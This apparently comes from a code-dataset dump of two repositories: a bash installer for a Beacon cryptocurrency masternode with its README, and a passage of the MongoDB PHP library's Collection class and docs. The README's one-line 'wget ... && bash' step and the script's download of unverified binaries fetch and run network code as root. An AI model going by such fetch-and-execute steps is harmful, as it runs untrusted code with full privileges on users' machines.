branch_name stringclasses 149 values | text stringlengths 23 89.3M | directory_id stringlengths 40 40 | languages listlengths 1 19 | num_files int64 1 11.8k | repo_language stringclasses 38 values | repo_name stringlengths 6 114 | revision_id stringlengths 40 40 | snapshot_id stringlengths 40 40 |
|---|---|---|---|---|---|---|---|---|
refs/heads/master | <file_sep>#!/bin/bash
# Beacon masternode (MN) installer.
# Installs build/runtime dependencies, creates a 4 GB swap file, installs the
# Beacon daemon binaries, and writes a masternode configuration file.
# Must be run as root.
clear
if [ "$EUID" -ne 0 ] ; then
echo "Please run as root"
exit
fi
echo "Do you want to install all needed dependencies (no if you did it before)? [y/n]"
read DOSETUP
if [[ $DOSETUP =~ "y" ]] ; then
sudo apt-get update
apt-get install -y software-properties-common
sudo add-apt-repository -y ppa:bitcoin/bitcoin
sudo apt-get update
sudo apt-get -y upgrade
sudo apt-get -y dist-upgrade
sudo apt-get install -y automake unzip autoconf libminiupnpc-dev libevent-dev libboost-all-dev libzmq3-dev build-essential libtool autotools-dev pkg-config libssl-dev nano htop git curl libdb4.8-dev libdb4.8++-dev
# Create and enable a 4 GB swap file (small VPSes need it while compiling).
cd /var
sudo touch swap.img
sudo chmod 600 swap.img
sudo dd if=/dev/zero of=/var/swap.img bs=1024k count=4000
sudo mkswap /var/swap.img
sudo swapon /var/swap.img
sudo free -mh
# The redirection runs in this (root) shell, so writing /etc/fstab works.
sudo echo "/var/swap.img none swap sw 0 0" >> /etc/fstab
cd
mkdir -p ~/bin
# NOTE(review): '>' overwrites any existing ~/.bash_aliases — confirm append was not intended.
echo 'export PATH=~/bin:$PATH' > ~/.bash_aliases
source ~/.bashrc
fi
echo "Do you want to compile Daemon (please choose no if you did it before)? [y/n]"
read DOSETUPTWO
if [[ $DOSETUPTWO =~ "y" ]] ; then
# Stop any running daemon before replacing the binaries (ignore errors if none).
beacon-cli stop > /dev/null 2>&1
wget https://github.com/beaconcrypto/beacon/releases/download/v1.1/becn11-daemon.zip
unzip becn11-daemon.zip
cp beacond /usr/local/bin/beacond
cp beacon-cli /usr/local/bin/beacon-cli
chmod +x /usr/local/bin/beacon*
fi
echo ""
echo "Configuring IP - Please Wait......."
# Collect the public IPv4 address reachable through each non-loopback interface.
declare -a NODE_IPS
for ips in $(netstat -i | awk '!/Kernel|Iface|lo/ {print $1," "}')
do
NODE_IPS+=($(curl --interface "$ips" --connect-timeout 2 -s4 icanhazip.com))
done
# If more than one public IP was found, let the user pick one by index.
if [ ${#NODE_IPS[@]} -gt 1 ]
then
echo -e "More than one IP. Please type 0 to use the first IP, 1 for the second and so on...${NC}"
INDEX=0
for ip in "${NODE_IPS[@]}"
do
echo ${INDEX} $ip
let INDEX=${INDEX}+1
done
read -e choose_ip
IP=${NODE_IPS[$choose_ip]}
else
IP=${NODE_IPS[0]}
fi
echo "IP Done"
echo ""
echo "Enter masternode private key for node $ALIAS , Go To your Windows Wallet Tools > Debug Console , Type masternode genkey"
read PRIVKEY
# Write the masternode configuration with randomized RPC credentials.
CONF_DIR=~/.beacon/
CONF_FILE=beacon.conf
PORT=11115
mkdir -p $CONF_DIR
echo "rpcuser=user"`shuf -i 100000-10000000 -n 1` > $CONF_DIR/$CONF_FILE
echo "rpcpassword=<PASSWORD>"`shuf -i 100000-10000000 -n 1` >> $CONF_DIR/$CONF_FILE
echo "rpcallowip=127.0.0.1" >> $CONF_DIR/$CONF_FILE
echo "rpcport=11116" >> $CONF_DIR/$CONF_FILE
echo "listen=1" >> $CONF_DIR/$CONF_FILE
echo "server=1" >> $CONF_DIR/$CONF_FILE
echo "daemon=1" >> $CONF_DIR/$CONF_FILE
echo "logtimestamps=1" >> $CONF_DIR/$CONF_FILE
echo "masternode=1" >> $CONF_DIR/$CONF_FILE
echo "port=$PORT" >> $CONF_DIR/$CONF_FILE
echo "masternodeaddr=$IP:$PORT" >> $CONF_DIR/$CONF_FILE
echo "masternodeprivkey=$PRIVKEY" >> $CONF_DIR/$CONF_FILE
# Start the daemon in background mode.
beacond --daemon
<file_sep># beacon-mn-setup
Beacon MN setup scripts & Guides
## beacon-mn.sh - Beacon MN install script (run it as root)
wget https://raw.githubusercontent.com/beaconcrypto/beacon-mn-setup/master/beacon_mn.sh && bash beacon_mn.sh
| f2575439c4339e64ac339a45e208089353967783 | [
"Markdown",
"Shell"
] | 2 | Shell | beaconcrypto/beacon-mn-setup | 90a5f91cac7c64b3a4c276fb53bb607fef3982e8 | 6e835b5713da69dc2981c85aaa47a87d8fb27297 |
refs/heads/master | <file_sep><?php
namespace MongoDB\Exception;
/**
 * Exception thrown for runtime errors within the library.
 *
 * Extends the SPL \RuntimeException and implements the package-level
 * Exception marker interface so callers can catch all library errors
 * with a single catch block.
 */
class RuntimeException extends \RuntimeException implements Exception
{
}
<file_sep># Usage
## Collection class
`MongoDB\Collection` is perhaps the most useful class in this library. It
provides methods for common operations on a collection, such as inserting
documents, querying, updating, counting, etc.
Constructing a `MongoDB\Collection` requires a `MongoDB\Manager` and a namespace
for the collection. A [MongoDB namespace](http://docs.mongodb.org/manual/faq/developers/#faq-dev-namespace)
consists of a database name and collection name joined by a dot. `examples.zips`
is one example of a namespace. A [write concern](http://docs.mongodb.org/manual/core/write-concern/)
and [read preference](http://docs.mongodb.org/manual/core/read-preference/) may
also be provided when constructing a Collection (if omitted, the Collection will
use the Manager's values as its defaults).
## Finding a specific document
```
<?php
// This path should point to Composer's autoloader
require_once __DIR__ . "/vendor/autoload.php";
$manager = new MongoDB\Driver\Manager("mongodb://localhost:27017");
$collection = new MongoDB\Collection($manager, "examples.zips");
$sunnyvale = $collection->findOne(array("_id" => "94086"));
var_dump($sunnyvale);
?>
```
Executing this script should yield the following output:
```
array(5) {
["_id"]=>
string(5) "94086"
["city"]=>
string(9) "SUNNYVALE"
["loc"]=>
array(2) {
[0]=>
float(-122.023771)
[1]=>
float(37.376407)
}
["pop"]=>
int(56215)
["state"]=>
string(2) "CA"
}
```
<file_sep><?php
// Example: bulk-import the MongoDB "zips" sample data set, one JSON
// document per line, into the examples.zips collection.
// NOTE(review): this example uses MongoDB\WriteBatch / MongoDB\Manager /
// executeWriteBatch, while the library code elsewhere in this repository
// uses MongoDB\Driver\BulkWrite / MongoDB\Driver\Manager — confirm which
// driver API version this example targets.
$file = "http://media.mongodb.org/zips.json";
// Read one JSON document per line, stripping trailing newlines.
$zips = file($file, FILE_IGNORE_NEW_LINES);
$batch = new MongoDB\WriteBatch(true); // true presumably means "ordered" — TODO confirm
foreach($zips as $string) {
$document = json_decode($string);
$batch->insert($document);
}
$manager = new MongoDB\Manager("mongodb://localhost");
$result = $manager->executeWriteBatch("examples.zips", $batch);
printf("Inserted %d documents\n", $result->getInsertedCount());
?>
<file_sep><?php
namespace MongoDB;
use MongoDB\Driver\BulkWrite;
use MongoDB\Driver\Command;
use MongoDB\Driver\Cursor;
use MongoDB\Driver\Manager;
use MongoDB\Driver\Query;
use MongoDB\Driver\ReadPreference;
use MongoDB\Driver\Server;
use MongoDB\Driver\WriteConcern;
use MongoDB\Exception\InvalidArgumentException;
use MongoDB\Exception\UnexpectedTypeException;
use MongoDB\Model\IndexInfoIterator;
use MongoDB\Model\IndexInfoIteratorIterator;
use MongoDB\Model\IndexInput;
class Collection
{
const VERSION = "0.1.0";
/* {{{ consts & vars */
const QUERY_FLAG_TAILABLE_CURSOR = 0x02;
const QUERY_FLAG_SLAVE_OKAY = 0x04;
const QUERY_FLAG_OPLOG_REPLY = 0x08;
const QUERY_FLAG_NO_CURSOR_TIMEOUT = 0x10;
const QUERY_FLAG_AWAIT_DATA = 0x20;
const QUERY_FLAG_EXHAUST = 0x40;
const QUERY_FLAG_PARTIAL = 0x80;
const CURSOR_TYPE_NON_TAILABLE = 0x00;
const CURSOR_TYPE_TAILABLE = self::QUERY_FLAG_TAILABLE_CURSOR;
//self::QUERY_FLAG_TAILABLE_CURSOR | self::QUERY_FLAG_AWAIT_DATA;
const CURSOR_TYPE_TAILABLE_AWAIT = 0x22;
const FIND_ONE_AND_RETURN_BEFORE = 0x01;
const FIND_ONE_AND_RETURN_AFTER = 0x02;
protected $manager;
protected $ns;
protected $wc;
protected $rp;
protected $dbname;
protected $collname;
/* }}} */
/**
 * Constructs new Collection instance.
 *
 * This class provides methods for collection-specific operations, such as
 * CRUD (i.e. create, read, update, and delete) and index management.
 *
 * @param Manager        $manager        Manager instance from the driver
 * @param string         $namespace      Collection namespace (e.g. "db.collection")
 * @param WriteConcern   $writeConcern   Default write concern to apply
 * @param ReadPreference $readPreference Default read preference to apply
 * @throws InvalidArgumentException if $namespace does not contain a "."
 *         separating the database and collection names
 */
public function __construct(Manager $manager, $namespace, WriteConcern $writeConcern = null, ReadPreference $readPreference = null)
{
    $namespace = (string) $namespace;
    // Validate up front: explode() below requires "db.collection" form, and a
    // namespace without a dot would leave $collname undefined.
    if (strpos($namespace, '.') === false) {
        throw new InvalidArgumentException('$namespace must be a fully qualified "databaseName.collectionName" namespace');
    }
    $this->manager = $manager;
    $this->ns = $namespace;
    $this->wc = $writeConcern;
    $this->rp = $readPreference;
    // Split on the first dot only: collection names may themselves contain dots.
    list($this->dbname, $this->collname) = explode('.', $namespace, 2);
}
/**
 * Return the collection namespace.
 *
 * @return string
 */
public function __toString()
{
return $this->ns;
}
/**
* Runs an aggregation framework pipeline
*
* Note: this method's return value depends on the MongoDB server version
* and the "useCursor" option. If "useCursor" is true, a Cursor will be
* returned; otherwise, an ArrayIterator is returned, which wraps the
* "result" array from the command response document.
*
* @see http://docs.mongodb.org/manual/reference/command/aggregate/
*
* @param array $pipeline The pipeline to execute
* @param array $options Additional options
* @return Iterator
*/
public function aggregate(array $pipeline, array $options = array())
{
$readPreference = new ReadPreference(ReadPreference::RP_PRIMARY);
$server = $this->manager->selectServer($readPreference);
if (FeatureDetection::isSupported($server, FeatureDetection::API_AGGREGATE_CURSOR)) {
$options = array_merge(
array(
/**
* Enables writing to temporary files. When set to true, aggregation stages
* can write data to the _tmp subdirectory in the dbPath directory. The
* default is false.
*
* @see http://docs.mongodb.org/manual/reference/command/aggregate/
*/
'allowDiskUse' => false,
/**
* The number of documents to return per batch.
*
* @see http://docs.mongodb.org/manual/reference/command/aggregate/
*/
'batchSize' => 0,
/**
* The maximum amount of time to allow the query to run.
*
* @see http://docs.mongodb.org/manual/reference/command/aggregate/
*/
'maxTimeMS' => 0,
/**
* Indicates if the results should be provided as a cursor.
*
* @see http://docs.mongodb.org/manual/reference/command/aggregate/
*/
'useCursor' => true,
),
$options
);
}
$options = $this->_massageAggregateOptions($options);
$command = new Command(array(
'aggregate' => $this->collname,
'pipeline' => $pipeline,
) + $options);
$cursor = $server->executeCommand($this->dbname, $command);
if ( ! empty($options["cursor"])) {
return $cursor;
}
$doc = current($cursor->toArray());
if ($doc["ok"]) {
return new \ArrayIterator(array_map(
function (\stdClass $document) { return (array) $document; },
$doc["result"]
));
}
throw $this->_generateCommandException($doc);
}
/**
* Adds a full set of write operations into a bulk and executes it
*
* The syntax of the $bulk array is:
* $bulk = [
* [
* 'METHOD' => [
* $document,
* $extraArgument1,
* $extraArgument2,
* ],
* ],
* [
* 'METHOD' => [
* $document,
* $extraArgument1,
* $extraArgument2,
* ],
* ],
* ]
*
*
* Where METHOD is one of
* - 'insertOne'
* Supports no $extraArgument
* - 'updateMany'
* Requires $extraArgument1, same as $update for Collection::updateMany()
* Optional $extraArgument2, same as $options for Collection::updateMany()
* - 'updateOne'
* Requires $extraArgument1, same as $update for Collection::updateOne()
* Optional $extraArgument2, same as $options for Collection::updateOne()
* - 'replaceOne'
* Requires $extraArgument1, same as $update for Collection::replaceOne()
* Optional $extraArgument2, same as $options for Collection::replaceOne()
* - 'deleteOne'
* Supports no $extraArgument
* - 'deleteMany'
* Supports no $extraArgument
*
* @example Collection-bulkWrite.php Using Collection::bulkWrite()
*
* @see Collection::getBulkOptions() for supported $options
*
* @param array $ops Array of operations
* @param array $options Additional options
* @return WriteResult
*/
public function bulkWrite(array $ops, array $options = array())
{
$options = array_merge($this->getBulkOptions(), $options);
$bulk = new BulkWrite($options["ordered"]);
$insertedIds = array();
foreach ($ops as $n => $op) {
foreach ($op as $opname => $args) {
if (!isset($args[0])) {
throw new InvalidArgumentException(sprintf("Missing argument#1 for '%s' (operation#%d)", $opname, $n));
}
switch ($opname) {
case "insertOne":
$insertedId = $bulk->insert($args[0]);
if ($insertedId !== null) {
$insertedIds[$n] = $insertedId;
} else {
$insertedIds[$n] = is_array($args[0]) ? $args[0]['_id'] : $args[0]->_id;
}
break;
case "updateMany":
if (!isset($args[1])) {
throw new InvalidArgumentException(sprintf("Missing argument#2 for '%s' (operation#%d)", $opname, $n));
}
$options = array_merge($this->getWriteOptions(), isset($args[2]) ? $args[2] : array(), array("multi" => true));
$firstKey = key($args[1]);
if (!isset($firstKey[0]) || $firstKey[0] != '$') {
throw new InvalidArgumentException("First key in \$update must be a \$operator");
}
$bulk->update($args[0], $args[1], $options);
break;
case "updateOne":
if (!isset($args[1])) {
throw new InvalidArgumentException(sprintf("Missing argument#2 for '%s' (operation#%d)", $opname, $n));
}
$options = array_merge($this->getWriteOptions(), isset($args[2]) ? $args[2] : array(), array("multi" => false));
$firstKey = key($args[1]);
if (!isset($firstKey[0]) || $firstKey[0] != '$') {
throw new InvalidArgumentException("First key in \$update must be a \$operator");
}
$bulk->update($args[0], $args[1], $options);
break;
case "replaceOne":
if (!isset($args[1])) {
throw new InvalidArgumentException(sprintf("Missing argument#2 for '%s' (operation#%d)", $opname, $n));
}
$options = array_merge($this->getWriteOptions(), isset($args[2]) ? $args[2] : array(), array("multi" => false));
$firstKey = key($args[1]);
if (isset($firstKey[0]) && $firstKey[0] == '$') {
throw new InvalidArgumentException("First key in \$update must NOT be a \$operator");
}
$bulk->update($args[0], $args[1], $options);
break;
case "deleteOne":
$options = array_merge($this->getWriteOptions(), isset($args[1]) ? $args[1] : array(), array("limit" => 1));
$bulk->delete($args[0], $options);
break;
case "deleteMany":
$options = array_merge($this->getWriteOptions(), isset($args[1]) ? $args[1] : array(), array("limit" => 0));
$bulk->delete($args[0], $options);
break;
default:
throw new InvalidArgumentException(sprintf("Unknown operation type called '%s' (operation#%d)", $opname, $n));
}
}
}
$writeResult = $this->manager->executeBulkWrite($this->ns, $bulk, $this->wc);
return new BulkWriteResult($writeResult, $insertedIds);
}
/**
 * Counts all documents matching $filter.
 * If no $filter is provided, returns the number of documents in the collection.
 *
 * NOTE(review): unlike distinct(), this method does not merge
 * getCountOptions() defaults into $options — confirm whether that
 * asymmetry is intentional.
 *
 * @see http://docs.mongodb.org/manual/reference/command/count/
 * @see Collection::getCountOptions() for supported $options
 *
 * @param array $filter  The find query to execute
 * @param array $options Additional options
 * @return integer
 */
public function count(array $filter = array(), array $options = array())
{
    // Cast the filter to an object so an empty filter serializes as {} not [].
    $command = array(
        "count" => $this->collname,
        "query" => (object) $filter,
    ) + $options;
    $response = current($this->_runCommand($this->dbname, $command)->toArray());
    if ( ! $response["ok"]) {
        throw $this->_generateCommandException($response);
    }
    return (integer) $response["n"];
}
/**
 * Create a single index for the collection.
 *
 * @see http://docs.mongodb.org/manual/reference/command/createIndexes/
 * @see http://docs.mongodb.org/manual/reference/method/db.collection.createIndex/
 * @see Collection::createIndexes()
 * @param array|object $key     Document containing fields mapped to values,
 *                              which denote order or an index type
 * @param array        $options Index options
 * @return string The name of the created index
 */
public function createIndex($key, array $options = array())
{
    // Delegate to createIndexes() with a single index specification; the
    // "key" entry takes precedence over any "key" in $options.
    $createdNames = $this->createIndexes(array(array('key' => $key) + $options));
    return current($createdNames);
}
/**
* Create one or more indexes for the collection.
*
* Each element in the $indexes array must have a "key" document, which
* contains fields mapped to an order or type. Other options may follow.
* For example:
*
* $indexes = [
* // Create a unique index on the "username" field
* [ 'key' => [ 'username' => 1 ], 'unique' => true ],
* // Create a 2dsphere index on the "loc" field with a custom name
* [ 'key' => [ 'loc' => '2dsphere' ], 'name' => 'geo' ],
* ];
*
* If the "name" option is unspecified, a name will be generated from the
* "key" document.
*
* @see http://docs.mongodb.org/manual/reference/command/createIndexes/
* @see http://docs.mongodb.org/manual/reference/method/db.collection.createIndex/
* @param array $indexes List of index specifications
* @return string[] The names of the created indexes
* @throws InvalidArgumentException if an index specification is invalid
*/
public function createIndexes(array $indexes)
{
if (empty($indexes)) {
return array();
}
foreach ($indexes as $i => $index) {
if ( ! is_array($index)) {
throw new UnexpectedTypeException($index, 'array');
}
if ( ! isset($index['ns'])) {
$index['ns'] = $this->ns;
}
$indexes[$i] = new IndexInput($index);
}
$readPreference = new ReadPreference(ReadPreference::RP_PRIMARY);
$server = $this->manager->selectServer($readPreference);
return (FeatureDetection::isSupported($server, FeatureDetection::API_CREATEINDEXES_CMD))
? $this->createIndexesCommand($server, $indexes)
: $this->createIndexesLegacy($server, $indexes);
}
/**
 * Deletes documents matching the $filter criteria.
 * NOTE: Will delete ALL documents matching $filter.
 *
 * @see http://docs.mongodb.org/manual/reference/command/delete/
 *
 * @param array $filter The $filter criteria to delete
 * @return DeleteResult
 */
public function deleteMany(array $filter)
{
    // limit=0 tells the server to remove every matching document.
    return new DeleteResult($this->_delete($filter, 0));
}
/**
 * Deletes a document matching the $filter criteria.
 * NOTE: Will delete at most ONE document matching $filter.
 *
 * @see http://docs.mongodb.org/manual/reference/command/delete/
 *
 * @param array $filter The $filter criteria to delete
 * @return DeleteResult
 */
public function deleteOne(array $filter)
{
    // _delete() defaults to limit=1, i.e. remove at most one document.
    return new DeleteResult($this->_delete($filter));
}
/**
 * Finds the distinct values for a specified field across the collection.
 *
 * @see http://docs.mongodb.org/manual/reference/command/distinct/
 * @see Collection::getDistinctOptions() for supported $options
 *
 * @param string $fieldName The field name to use
 * @param array  $filter    The find query to execute
 * @param array  $options   Additional options
 * @return array The distinct values
 */
public function distinct($fieldName, array $filter = array(), array $options = array())
{
    $mergedOptions = array_merge($this->getDistinctOptions(), $options);
    // Cast the filter to an object so an empty filter serializes as {} not [].
    $command = array(
        "distinct" => $this->collname,
        "key" => $fieldName,
        "query" => (object) $filter,
    ) + $mergedOptions;
    $response = current($this->_runCommand($this->dbname, $command)->toArray());
    if ( ! $response["ok"]) {
        throw $this->_generateCommandException($response);
    }
    return $response["values"];
}
/**
 * Drop this collection.
 *
 * @see http://docs.mongodb.org/manual/reference/command/drop/
 * @return Cursor
 */
public function drop()
{
    // The drop command must run against a primary.
    return $this->manager->executeCommand(
        $this->dbname,
        new Command(array('drop' => $this->collname)),
        new ReadPreference(ReadPreference::RP_PRIMARY)
    );
}
/**
 * Drop a single index in the collection.
 *
 * @see http://docs.mongodb.org/manual/reference/command/dropIndexes/
 * @see http://docs.mongodb.org/manual/reference/method/db.collection.dropIndex/
 * @param string $indexName
 * @return Cursor
 * @throws InvalidArgumentException if $indexName is an empty string or "*"
 */
public function dropIndex($indexName)
{
    $indexName = (string) $indexName;
    // Guard clauses: reject names the dropIndexes command would misinterpret.
    if ($indexName === '') {
        throw new InvalidArgumentException('Index name cannot be empty');
    }
    if ($indexName === '*') {
        throw new InvalidArgumentException('dropIndexes() must be used to drop multiple indexes');
    }
    // The dropIndexes command must run against a primary.
    return $this->manager->executeCommand(
        $this->dbname,
        new Command(array('dropIndexes' => $this->collname, 'index' => $indexName)),
        new ReadPreference(ReadPreference::RP_PRIMARY)
    );
}
/**
 * Drop all indexes in the collection.
 *
 * @see http://docs.mongodb.org/manual/reference/command/dropIndexes/
 * @see http://docs.mongodb.org/manual/reference/method/db.collection.dropIndexes/
 * @return Cursor
 */
public function dropIndexes()
{
    // index "*" instructs the server to drop every index on the collection;
    // the command must run against a primary.
    return $this->manager->executeCommand(
        $this->dbname,
        new Command(array('dropIndexes' => $this->collname, 'index' => '*')),
        new ReadPreference(ReadPreference::RP_PRIMARY)
    );
}
/**
 * Performs a find (query) on the collection.
 *
 * @see http://docs.mongodb.org/manual/core/read-operations-introduction/
 * @see Collection::getFindOptions() for supported $options
 *
 * @param array $filter  The find query to execute
 * @param array $options Additional options
 * @return Cursor
 */
public function find(array $filter = array(), array $options = array())
{
    // Caller-supplied options override the defaults from getFindOptions().
    $mergedOptions = array_merge($this->getFindOptions(), $options);
    return $this->manager->executeQuery(
        $this->ns,
        $this->_buildQuery($filter, $mergedOptions),
        $this->rp
    );
}
/**
 * Performs a find (query) on the collection, returning at most one result.
 *
 * @see http://docs.mongodb.org/manual/core/read-operations-introduction/
 * @see Collection::getFindOptions() for supported $options
 *
 * @param array $filter  The find query to execute
 * @param array $options Additional options
 * @return array|false The matched document, or false on failure
 */
public function findOne(array $filter = array(), array $options = array())
{
    // Force limit=1, but still let the caller override it via $options.
    $mergedOptions = array_merge($this->getFindOptions(), array("limit" => 1), $options);
    $cursor = $this->manager->executeQuery(
        $this->ns,
        $this->_buildQuery($filter, $mergedOptions),
        $this->rp
    );
    $documents = iterator_to_array($cursor);
    return $documents ? $documents[0] : false;
}
/**
* Finds a single document and deletes it, returning the original.
*
* @see http://docs.mongodb.org/manual/reference/command/findAndModify/
* @see Collection::getFindOneAndDelete() for supported $options
*
* @param array $filter The $filter criteria to search for
* @param array $options Additional options
* @return array The original document
*/
public function findOneAndDelete(array $filter, array $options = array())
{
$options = array_merge($this->getFindOneAndDeleteOptions(), $options);
$options = $this->_massageFindAndModifyOptions($options);
$cmd = array(
"findandmodify" => $this->collname,
"query" => $filter,
) + $options;
$doc = current($this->_runCommand($this->dbname, $cmd)->toArray());
if ($doc["ok"]) {
return is_object($doc["value"]) ? (array) $doc["value"] : $doc["value"];
}
throw $this->_generateCommandException($doc);
}
/**
* Finds a single document and replaces it, returning either the original or the replaced document
* By default, returns the original document.
* To return the new document set:
* $options = array("returnDocument" => Collection::FIND_ONE_AND_RETURN_AFTER);
*
* @see http://docs.mongodb.org/manual/reference/command/findAndModify/
* @see Collection::getFindOneAndReplace() for supported $options
*
* @param array $filter The $filter criteria to search for
* @param array $replacement The document to replace with
* @param array $options Additional options
* @return array
*/
public function findOneAndReplace(array $filter, array $replacement, array $options = array())
{
$firstKey = key($replacement);
if (isset($firstKey[0]) && $firstKey[0] == '$') {
throw new InvalidArgumentException("First key in \$replacement must NOT be a \$operator");
}
$options = array_merge($this->getFindOneAndReplaceOptions(), $options);
$options = $this->_massageFindAndModifyOptions($options, $replacement);
$cmd = array(
"findandmodify" => $this->collname,
"query" => $filter,
) + $options;
$doc = current($this->_runCommand($this->dbname, $cmd)->toArray());
if ($doc["ok"]) {
return $this->_massageFindAndModifyResult($doc, $options);
}
throw $this->_generateCommandException($doc);
}
/**
* Finds a single document and updates it, returning either the original or the updated document
* By default, returns the original document.
* To return the new document set:
* $options = array("returnDocument" => Collection::FIND_ONE_AND_RETURN_AFTER);
*
*
* @see http://docs.mongodb.org/manual/reference/command/findAndModify/
* @see Collection::getFindOneAndUpdate() for supported $options
*
* @param array $filter The $filter criteria to search for
* @param array $update An array of update operators to apply to the document
* @param array $options Additional options
* @return array
*/
public function findOneAndUpdate(array $filter, array $update, array $options = array())
{
$firstKey = key($update);
if (!isset($firstKey[0]) || $firstKey[0] != '$') {
throw new InvalidArgumentException("First key in \$update must be a \$operator");
}
$options = array_merge($this->getFindOneAndUpdateOptions(), $options);
$options = $this->_massageFindAndModifyOptions($options, $update);
$cmd = array(
"findandmodify" => $this->collname,
"query" => $filter,
) + $options;
$doc = current($this->_runCommand($this->dbname, $cmd)->toArray());
if ($doc["ok"]) {
return $this->_massageFindAndModifyResult($doc, $options);
}
throw $this->_generateCommandException($doc);
}
/**
* Retrieves all Bulk Write options with their default values.
*
* @return array of available Bulk Write options
*/
public function getBulkOptions()
{
return array(
"ordered" => false,
);
}
/**
* Return the collection name.
*
* @return string
*/
public function getCollectionName()
{
return $this->collname;
}
/**
* Retrieves all count options with their default values.
*
* @return array of Collection::count() options
*/
public function getCountOptions()
{
return array(
/**
* The index to use.
*
* @see http://docs.mongodb.org/manual/reference/command/count/
*/
"hint" => "", // string or document
/**
* The maximum number of documents to count.
*
* @see http://docs.mongodb.org/manual/reference/command/count/
*/
"limit" => 0,
/**
* The maximum amount of time to allow the query to run.
*
* @see http://docs.mongodb.org/manual/reference/command/count/
*/
"maxTimeMS" => 0,
/**
* The number of documents to skip before returning the documents.
*
* @see http://docs.mongodb.org/manual/reference/command/count/
*/
"skip" => 0,
);
}
/**
* Return the database name.
*
* @return string
*/
public function getDatabaseName()
{
return $this->dbname;
}
/**
* Retrieves all distinct options with their default values.
*
* @return array of Collection::distinct() options
*/
public function getDistinctOptions()
{
return array(
/**
* The maximum amount of time to allow the query to run. The default is infinite.
*
* @see http://docs.mongodb.org/manual/reference/command/distinct/
*/
"maxTimeMS" => 0,
);
}
/**
* Retrieves all findOneDelete options with their default values.
*
* @return array of Collection::findOneAndDelete() options
*/
public function getFindOneAndDeleteOptions()
{
return array(
/**
* The maximum amount of time to allow the query to run.
*
* @see http://docs.mongodb.org/manual/reference/command/findAndModify/
*/
"maxTimeMS" => 0,
/**
* Limits the fields to return for all matching documents.
*
* @see http://docs.mongodb.org/manual/tutorial/project-fields-from-query-results
*/
"projection" => array(),
/**
* Determines which document the operation modifies if the query selects multiple documents.
*
* @see http://docs.mongodb.org/manual/reference/command/findAndModify/
*/
"sort" => array(),
);
}
/**
* Retrieves all findOneAndReplace options with their default values.
*
* @return array of Collection::findOneAndReplace() options
*/
public function getFindOneAndReplaceOptions()
{
return array(
/**
* The maximum amount of time to allow the query to run.
*
* @see http://docs.mongodb.org/manual/reference/command/findAndModify/
*/
"maxTimeMS" => 0,
/**
* Limits the fields to return for all matching documents.
*
* @see http://docs.mongodb.org/manual/tutorial/project-fields-from-query-results
*/
"projection" => array(),
/**
* When ReturnDocument.After, returns the replaced or inserted document rather than the original.
* Defaults to ReturnDocument.Before.
*
* @see http://docs.mongodb.org/manual/reference/command/findAndModify/
*/
"returnDocument" => self::FIND_ONE_AND_RETURN_BEFORE,
/**
* Determines which document the operation modifies if the query selects multiple documents.
*
* @see http://docs.mongodb.org/manual/reference/command/findAndModify/
*/
"sort" => array(),
/**
* When true, findAndModify creates a new document if no document matches the query. The
* default is false.
*
* @see http://docs.mongodb.org/manual/reference/command/findAndModify/
*/
"upsert" => false,
);
}
/**
* Retrieves all findOneAndUpdate options with their default values.
*
* @return array of Collection::findOneAndUpdate() options
*/
public function getFindOneAndUpdateOptions()
{
return array(
/**
* The maximum amount of time to allow the query to run.
*
* @see http://docs.mongodb.org/manual/reference/command/findAndModify/
*/
"maxTimeMS" => 0,
/**
* Limits the fields to return for all matching documents.
*
* @see http://docs.mongodb.org/manual/tutorial/project-fields-from-query-results
*/
"projection" => array(),
/**
* When ReturnDocument.After, returns the updated or inserted document rather than the original.
* Defaults to ReturnDocument.Before.
*
* @see http://docs.mongodb.org/manual/reference/command/findAndModify/
*/
"returnDocument" => self::FIND_ONE_AND_RETURN_BEFORE,
/**
* Determines which document the operation modifies if the query selects multiple documents.
*
* @see http://docs.mongodb.org/manual/reference/command/findAndModify/
*/
"sort" => array(),
/**
* When true, creates a new document if no document matches the query. The default is false.
*
* @see http://docs.mongodb.org/manual/reference/command/findAndModify/
*/
"upsert" => false,
);
}
/**
* Retrieves all find options with their default values.
*
* @return array of Collection::find() options
*/
public function getFindOptions()
{
return array(
/**
* Get partial results from a mongos if some shards are down (instead of throwing an error).
*
* @see http://docs.mongodb.org/meta-driver/latest/legacy/mongodb-wire-protocol/#op-query
*/
"allowPartialResults" => false,
/**
* The number of documents to return per batch.
*
* @see http://docs.mongodb.org/manual/reference/method/cursor.batchSize/
*/
"batchSize" => 101,
/**
* Attaches a comment to the query. If $comment also exists
* in the modifiers document, the comment field overwrites $comment.
*
* @see http://docs.mongodb.org/manual/reference/operator/meta/comment/
*/
"comment" => "",
/**
* Indicates the type of cursor to use. This value includes both
* the tailable and awaitData options.
* The default is Collection::CURSOR_TYPE_NON_TAILABLE.
*
* @see http://docs.mongodb.org/manual/reference/operator/meta/comment/
*/
"cursorType" => self::CURSOR_TYPE_NON_TAILABLE,
/**
* The maximum number of documents to return.
*
* @see http://docs.mongodb.org/manual/reference/method/cursor.limit/
*/
"limit" => 0,
/**
* The maximum amount of time to allow the query to run. If $maxTimeMS also exists
* in the modifiers document, the maxTimeMS field overwrites $maxTimeMS.
*
* @see http://docs.mongodb.org/manual/reference/operator/meta/maxTimeMS/
*/
"maxTimeMS" => 0,
/**
* Meta-operators modifying the output or behavior of a query.
*
* @see http://docs.mongodb.org/manual/reference/operator/query-modifier/
*/
"modifiers" => array(),
/**
* The server normally times out idle cursors after an inactivity period (10 minutes)
* to prevent excess memory use. Set this option to prevent that.
*
* @see http://docs.mongodb.org/meta-driver/latest/legacy/mongodb-wire-protocol/#op-query
*/
"noCursorTimeout" => false,
/**
* Internal replication use only - driver should not set
*
* @see http://docs.mongodb.org/meta-driver/latest/legacy/mongodb-wire-protocol/#op-query
* @internal
*/
"oplogReplay" => false,
/**
* Limits the fields to return for all matching documents.
*
* @see http://docs.mongodb.org/manual/tutorial/project-fields-from-query-results/
*/
"projection" => array(),
/**
* The number of documents to skip before returning.
*
* @see http://docs.mongodb.org/manual/reference/method/cursor.skip/
*/
"skip" => 0,
/**
* The order in which to return matching documents. If $orderby also exists
* in the modifiers document, the sort field overwrites $orderby.
*
* @see http://docs.mongodb.org/manual/reference/method/cursor.sort/
*/
"sort" => array(),
);
}
/**
* Return the collection namespace.
*
* @see http://docs.mongodb.org/manual/faq/developers/#faq-dev-namespace
* @return string
*/
public function getNamespace()
{
return $this->ns;
}
/**
* Retrieves all Write options with their default values.
*
* @return array of available Write options
*/
public function getWriteOptions()
{
return array(
"ordered" => false,
"upsert" => false,
"limit" => 1,
);
}
/**
* Inserts the provided documents
*
